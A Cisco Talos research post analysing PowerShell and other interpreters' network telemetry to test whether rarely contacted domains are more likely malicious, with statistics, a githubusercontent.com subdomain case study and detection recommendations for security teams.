Scarcity signals: Are rare activities red flags?

By Darin Smith and John Arneson

Cisco Talos reviewed six months of network connection telemetry logs spanning June 1, 2024 – Dec. 31, 2024, containing 3,220,829 log events and 742 unique base domains, to explore if domains that PowerShell rarely contacts are more likely to be malicious.
Key findings reveal that the odds of a rare domain being malicious were 3.18 times higher than for frequently contacted domains (95% CI: 0.39–25.9), suggesting a trend towards higher risk in rare domains.
Notably, the non-rare domain ‘githubusercontent.com’ was flagged as malicious due to activity from its subdomain ‘raw.githubusercontent.com’. This is an example of why subdomains should be considered when looking for malicious network traffic, especially for cloud services where the service itself is legitimate, but the content hosted on it is not guaranteed to be.

Research Methodology

Hypothesis

At a sufficiently high volume of telemetry, domain names that PowerShell rarely connects to are more likely to be malicious than domains that are frequently connected to, regardless of PowerShell module.

Data Collection

Talos queried telemetry for PowerShell network connection logs from a time period of June 1, 2024 to Dec. 31, 2024. This dataset included the following processes: ‘powershell.exe’, ‘powershell studio.exe’, ‘powershell_ise.exe’, ‘powershelltools.exe’, ‘powershelltoolsx64.exe’, ‘pwsh’, and ‘pwsh.exe’. All of these processes are different versions of PowerShell. Talos excluded non-public top-level domains (TLDs), such as internal domains, to focus on external connections. 

Data Processing

Using the tldextract library, Talos extracted base domains (e.g., ‘automox.com’ from ‘api.automox.com’), resulting in 742 unique base domains. Rarity was defined as an average of ≤5 average contacts per full domain, calculated by dividing the total contacts by the number of unique full domains per base domain. This threshold identified 550 rare domains (74.1% of the total). 

Threat Intelligence and Manual Review

Talos assessed domain reputation using ReversingLabs (RL), which flagged a domain as malicious if any third-party source indicated so. To mitigate false positives (e.g., ‘adobe.com’), 29 domains were manually reviewed and overridden as benign, and their process arguments were documented. For subdomains such as ‘raw.githubusercontent.com’ under ‘githubusercontent.com’, the process arguments in those logs were manually reviewed, flagging 5 out of 10 connections as malicious based on commands like downloading PowerSploit or executing Invoke-Mimikatz, ensuring comprehensive threat detection.

Findings & Analysis

Domain Contact Distribution

The distribution of contacts was heavily skewed:

Percentiles: 60th percentile at 5.0 contacts, 90th at 82.0, 95th at 321.55, and 99th at 7,925.87
Top Domains: ‘automox.com’ (2,282,308 contacts), ‘launchdarkly.com’ (493,812), and ‘amazonaws.com’ (166,536) accounted for most activity.
- Automox is a service for automated endpoint configuration and patch management.
- LaunchDarkly is a software development platform for managing feature flags and context-aware targeting of features.
- Amazon Web Services (AWS) is the largest cloud service provider.
Rare Domains: 550 of 742 domains fell into the rare category.

Scarcity signals: Are rare activities red flags? — Figure 1. Cumulative distribution of domain contact frequencies.

Malicious Domain Statistics

Rare Domains: 9 malicious out of 550 (1.64%, 95% CI: 0.86%–3.08%)
Non-Rare Domains: 1 malicious out of 192 (0.52%, 95% CI: 0.09%–2.89%), notably ‘githubusercontent.com’
Odds Ratio: 3.18 (95% CI: 0.39–25.9), indicating a trend towards higher risk in rare domains, though not statistically significant (chi-square p=0.4291, Fisher’s exact p=0.4668), likely due to small sample sizes (9 rare, 1 non-rare)

Case Study: githubusercontent.com

The non-rare domain ‘githubusercontent.com’ (38 contacts, 2 full domains: ‘raw.githubusercontent.com’ and ‘objects.githubusercontent.com’, average 19.00 contacts per full domain) was flagged as malicious due to 5 manually identified malicious contacts from ‘raw.githubusercontent.com’. These contacts involved potentially malicious PowerShell commands, such as downloading and executing scripts like PowerSploit or Invoke-Mimikatz. The other subdomain, ‘objects.githubusercontent.com’ (28 contacts), showed no malicious activity. This finding illustrates that even frequently contacted domains can host malicious subdomains, emphasizing the need for subdomain-level analysis in threat detection.

Comparison to other Processes

Another research question investigated was how the domains contacted by other similar processes would compare to those contacted by PowerShell. For the purposes of this research, Talos chose the following processes for analysis:

‘rundll32.exe’
Python (including macOS and Windows versions)
‘cmd.exe’
‘cscript.exe’
‘wscript.exe’
‘bash’
‘zsh’

These processes are primarily other command line or script interpreters, as well as ‘rundll32.exe’, which allows executing Dynamically Linked Libraries (DLLs) from the command line.

When the same heuristics as were utilized for PowerShell were applied to the domains contacted by these processes, the results varied somewhat. Across 156,203 total connection records for ‘rundll32.exe’, 940 unique domains were contacted. Of these, 722 of these domains were “rare,” using the same heuristic applied to PowerShell (i.e., they were contacted at most five times). Only one of the domains contacted was found to be malicious, either among the rare domains or the non-rare domains.

Similarly, among 795,346 total connection records for Python, 825 unique domains were contacted and 616 were rare using the same criteria. None of the rare domains were malicious, while 1 of the non-rare domains was. The processes cscript, cmd, zsh and csh had similar results, with no or single digit numbers of malicious domains contacted. However, wscript was much more interesting. It had a much smaller amount of total utilization in the dataset investigated, with just 6,936 connection events and 82 unique domains contacted. Of these, 58 domains were rare (or roughly 71%), and 5 were found to be malicious.

Recommendations

Prioritize Rare Domains: Security teams should focus investigations on rare domains due to their higher likelihood of being malicious, despite statistical non-significance. This finding applies primarily to PowerShell and wscript among the processes considered in this research.
Subdomain Analysis: For frequently contacted domains, analyze subdomains and process arguments to detect malicious activity, as demonstrated with ‘githubusercontent.com’.
Integrate Manual Review: Combine automated threat intelligence with manual reviews to reduce false positives and identify nuanced threats, particularly in high-contact domains.
Investigate Anomalous Utilization of ‘wscript.exe’: Some environments may still commonly utilize wscript. However, this research suggests that in environments where it is rare, it has the highest likelihood to be used to connect to malicious domains of the processes researched.

Future Work

This research presents several opportunities for future research. One opportunity is temporal analysis to determine if there were time-based patterns for contacting domains, and if so, determining if these patterns could be used to identify malicious activity. This could potentially include seeing increased contacts of malicious domains during weekends or off-hours. Time-series analysis could be applied to the data to test this hypothesis.

Another opportunity is the behavioral analysis of process arguments, focusing on identifying recurring patterns tied to malicious activity, such as downloading PowerShell scripts from a remote host, or exfiltration of data. This could be used to refine the current rarity to malicious correlation of 1.64% for rare domains versus 0.52% for non-rare domains. This may spotlight behavioral red flags and give actionable insights for more precision detection logic.

Finally, future research can develop a risk scoring system that integrates multiple factors such as contact frequency, malicious rate, TLDs and even ReversingLabs’ network threat intelligence. This can provide a scalable and practical tool for security teams to prioritize high-risk domains, whether rare or non-rare like ‘githubusercontent.com’. This builds on the current analysis but also paves the way for more robust, data-driven strategies to combat threats, ensuring this research delivers lasting value to the security community.

Call Us Today +1 (313) 473-7670‬